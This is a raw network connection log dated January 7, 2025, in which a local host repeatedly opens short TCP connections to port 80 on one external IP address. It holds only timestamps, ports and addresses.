Jan 7, 2025 11:02:09.043936014 CET	49723	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.048486948 CET	80	49723	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.190565109 CET	49724	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.195354939 CET	80	49724	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.195424080 CET	49724	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.198668003 CET	49724	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.203500986 CET	80	49724	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.203965902 CET	49724	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.208797932 CET	80	49724	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.690165997 CET	80	49724	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.690323114 CET	49724	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.690346956 CET	80	49724	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.690578938 CET	49724	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.695621014 CET	80	49724	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.848130941 CET	49725	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.853095055 CET	80	49725	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.853174925 CET	49725	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.855159998 CET	49725	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.859947920 CET	80	49725	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:09.860002995 CET	49725	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:09.864732981 CET	80	49725	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:10.371232986 CET	80	49725	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:10.371373892 CET	80	49725	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:10.371490955 CET	49725	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:10.371490955 CET	49725	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:10.376291037 CET	80	49725	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:10.534697056 CET	49727	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:10.539555073 CET	80	49727	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:10.539704084 CET	49727	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:10.541896105 CET	49727	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:10.546634912 CET	80	49727	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:10.546688080 CET	49727	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:10.551412106 CET	80	49727	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.080061913 CET	80	49727	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.080194950 CET	49727	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.080303907 CET	80	49727	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.080518007 CET	49727	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.085021019 CET	80	49727	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.220710039 CET	49730	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.225555897 CET	80	49730	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.225632906 CET	49730	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.228847027 CET	49730	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.233669043 CET	80	49730	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.233719110 CET	49730	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.238462925 CET	80	49730	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.739454031 CET	80	49730	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.739550114 CET	80	49730	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.739563942 CET	49730	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.739589930 CET	49730	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.744333982 CET	80	49730	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.945987940 CET	49732	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.950828075 CET	80	49732	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.950895071 CET	49732	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.953372002 CET	49732	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.958091974 CET	80	49732	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:11.958149910 CET	49732	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:11.962867975 CET	80	49732	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:12.466356039 CET	80	49732	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:12.466414928 CET	80	49732	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:12.466481924 CET	49732	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:12.466595888 CET	49732	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:12.471383095 CET	80	49732	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:12.606138945 CET	49734	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:12.610961914 CET	80	49734	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:12.611033916 CET	49734	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:12.613010883 CET	49734	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:12.617769003 CET	80	49734	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:12.617820978 CET	49734	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:12.622617960 CET	80	49734	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.113827944 CET	80	49734	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.113858938 CET	80	49734	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.113940001 CET	49734	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.114291906 CET	49734	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.119051933 CET	80	49734	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.247081041 CET	49736	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.251914024 CET	80	49736	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.252233028 CET	49736	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.254044056 CET	49736	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.258795023 CET	80	49736	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.258855104 CET	49736	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.263572931 CET	80	49736	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.753712893 CET	80	49736	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.753892899 CET	80	49736	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.753937960 CET	49736	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.753937960 CET	49736	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.758671999 CET	80	49736	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.903013945 CET	49738	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.907902956 CET	80	49738	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.907987118 CET	49738	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.910933971 CET	49738	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.915663958 CET	80	49738	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:13.915719986 CET	49738	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:13.920483112 CET	80	49738	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:14.420567036 CET	80	49738	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:14.420655966 CET	80	49738	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:14.420665979 CET	49738	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:14.420702934 CET	49738	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:14.425477982 CET	80	49738	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:14.563673019 CET	49739	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:14.568542957 CET	80	49739	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:14.568614006 CET	49739	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:14.570837021 CET	49739	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:14.575571060 CET	80	49739	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:14.575613976 CET	49739	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:14.580353975 CET	80	49739	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.079121113 CET	80	49739	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.079147100 CET	80	49739	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.079219103 CET	49739	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.084090948 CET	49739	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.088893890 CET	80	49739	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.229965925 CET	49740	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.234828949 CET	80	49740	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.234899998 CET	49740	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.236804008 CET	49740	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.241566896 CET	80	49740	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.241631031 CET	49740	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.246385098 CET	80	49740	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.751667976 CET	80	49740	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.751764059 CET	49740	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.752302885 CET	80	49740	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.752410889 CET	49740	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.756570101 CET	80	49740	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.886805058 CET	49741	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.891594887 CET	80	49741	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.891676903 CET	49741	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.893388033 CET	49741	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.898205996 CET	80	49741	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:15.898263931 CET	49741	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:15.903089046 CET	80	49741	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:16.407164097 CET	80	49741	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:16.407291889 CET	80	49741	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:16.407319069 CET	49741	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:16.407490969 CET	49741	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:16.412070990 CET	80	49741	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:16.547904968 CET	49742	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:16.552794933 CET	80	49742	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:16.553221941 CET	49742	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:16.556257963 CET	49742	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:16.561177015 CET	80	49742	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:16.561248064 CET	49742	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:16.566004038 CET	80	49742	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.069873095 CET	80	49742	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.069999933 CET	80	49742	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.070038080 CET	49742	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.070110083 CET	49742	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.074803114 CET	80	49742	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.263380051 CET	49748	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.269773006 CET	80	49748	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.269892931 CET	49748	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.271879911 CET	49748	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.278181076 CET	80	49748	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.278413057 CET	49748	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.284838915 CET	80	49748	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.794280052 CET	80	49748	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.794703960 CET	80	49748	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.794738054 CET	49748	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.794898987 CET	49748	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.799463987 CET	80	49748	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.946511030 CET	49754	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.952960014 CET	80	49754	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.953078032 CET	49754	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.954827070 CET	49754	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.961110115 CET	80	49754	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:17.961173058 CET	49754	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:17.967468023 CET	80	49754	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:18.478518009 CET	80	49754	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:18.478662014 CET	80	49754	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:18.478663921 CET	49754	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:18.478698969 CET	49754	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:18.483474970 CET	80	49754	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:18.628479004 CET	49760	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:18.633311033 CET	80	49760	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:18.633389950 CET	49760	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:18.635102987 CET	49760	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:18.640023947 CET	80	49760	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:18.640080929 CET	49760	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:18.645277977 CET	80	49760	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.157036066 CET	80	49760	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.157048941 CET	80	49760	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.157102108 CET	49760	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.157155991 CET	49760	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.162697077 CET	80	49760	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.314781904 CET	49766	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.320288897 CET	80	49766	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.320357084 CET	49766	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.322249889 CET	49766	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.327022076 CET	80	49766	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.327075005 CET	49766	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.331886053 CET	80	49766	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.851816893 CET	80	49766	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.851891041 CET	80	49766	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:19.851954937 CET	49766	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.851998091 CET	49766	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:19.856728077 CET	80	49766	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.031176090 CET	49772	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.036051989 CET	80	49772	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.036123037 CET	49772	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.038256884 CET	49772	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.043003082 CET	80	49772	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.043059111 CET	49772	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.047864914 CET	80	49772	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.564466000 CET	80	49772	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.564687967 CET	80	49772	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.564861059 CET	49772	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.564862013 CET	49772	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.569614887 CET	80	49772	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.730268955 CET	49778	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.735151052 CET	80	49778	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.735235929 CET	49778	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.737291098 CET	49778	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.742038012 CET	80	49778	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:20.742103100 CET	49778	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:20.746876001 CET	80	49778	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.267196894 CET	80	49778	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.267237902 CET	80	49778	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.267286062 CET	49778	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.267323017 CET	49778	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.272043943 CET	80	49778	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.419378042 CET	49784	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.424326897 CET	80	49784	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.424410105 CET	49784	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.426393032 CET	49784	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.431159973 CET	80	49784	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.431219101 CET	49784	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.435969114 CET	80	49784	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.949470043 CET	80	49784	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.949579954 CET	80	49784	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:21.949589968 CET	49784	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.949634075 CET	49784	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:21.954457998 CET	80	49784	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.110676050 CET	49790	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.115627050 CET	80	49790	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.115818977 CET	49790	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.117657900 CET	49790	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.122401953 CET	80	49790	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.122622013 CET	49790	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.127392054 CET	80	49790	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.615750074 CET	80	49790	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.615902901 CET	49790	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.616022110 CET	80	49790	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.616096973 CET	49790	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.620794058 CET	80	49790	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.789629936 CET	49795	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.794501066 CET	80	49795	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.794573069 CET	49795	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.796658039 CET	49795	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.801505089 CET	80	49795	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:22.801706076 CET	49795	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:22.806499958 CET	80	49795	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:23.331206083 CET	80	49795	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:23.331352949 CET	49795	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:23.331357002 CET	80	49795	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:23.331403017 CET	49795	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:23.336150885 CET	80	49795	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:23.512455940 CET	49801	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:23.517286062 CET	80	49801	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:23.517360926 CET	49801	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:23.519656897 CET	49801	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:23.524414062 CET	80	49801	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:23.524470091 CET	49801	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:23.529253006 CET	80	49801	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.058000088 CET	80	49801	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.058017969 CET	80	49801	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.058134079 CET	49801	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.058204889 CET	49801	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.064049959 CET	80	49801	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.232785940 CET	49804	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.240595102 CET	80	49804	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.240677118 CET	49804	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.242893934 CET	49804	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.247982025 CET	80	49804	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.248034000 CET	49804	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.252974033 CET	80	49804	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.758451939 CET	80	49804	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.758618116 CET	80	49804	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.758688927 CET	49804	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.758750916 CET	49804	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.766690969 CET	80	49804	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.953684092 CET	49810	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.958527088 CET	80	49810	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.961407900 CET	49810	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.973608971 CET	49810	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.978467941 CET	80	49810	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:24.981285095 CET	49810	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:24.986134052 CET	80	49810	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:25.495547056 CET	80	49810	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:25.495646954 CET	49810	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:25.495830059 CET	80	49810	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:25.495874882 CET	49810	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:25.500461102 CET	80	49810	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:25.659077883 CET	49815	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:25.663870096 CET	80	49815	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:25.663978100 CET	49815	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:25.665812969 CET	49815	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:25.670547009 CET	80	49815	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:25.670615911 CET	49815	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:25.675379992 CET	80	49815	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.181912899 CET	80	49815	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.182013988 CET	49815	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.182034016 CET	80	49815	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.183226109 CET	49815	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.186769009 CET	80	49815	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.400387049 CET	49821	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.406590939 CET	80	49821	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.407283068 CET	49821	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.418051958 CET	49821	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.424271107 CET	80	49821	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.424355984 CET	49821	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.430676937 CET	80	49821	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.935461998 CET	80	49821	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.935502052 CET	80	49821	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:26.935611963 CET	49821	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.935611963 CET	49821	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:26.940462112 CET	80	49821	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.131792068 CET	49828	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.137001038 CET	80	49828	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.137063026 CET	49828	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.139137030 CET	49828	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.144098043 CET	80	49828	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.144150019 CET	49828	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.149286985 CET	80	49828	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.635956049 CET	80	49828	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.636198997 CET	80	49828	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.636276007 CET	49828	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.636333942 CET	49828	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.641072989 CET	80	49828	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.935025930 CET	49834	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.940329075 CET	80	49834	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.940542936 CET	49834	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.942557096 CET	49834	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.947901964 CET	80	49834	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:27.947959900 CET	49834	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:27.952791929 CET	80	49834	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:28.470149040 CET	80	49834	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:28.470233917 CET	49834	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:28.470446110 CET	80	49834	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:28.470551014 CET	49834	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:28.475020885 CET	80	49834	172.245.123.11	192.168.2.5
Jan 7, 2025 11:02:28.626100063 CET	49839	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:02:28.630897045 CET	80	49839	172.245.123.11	192.168.2.5
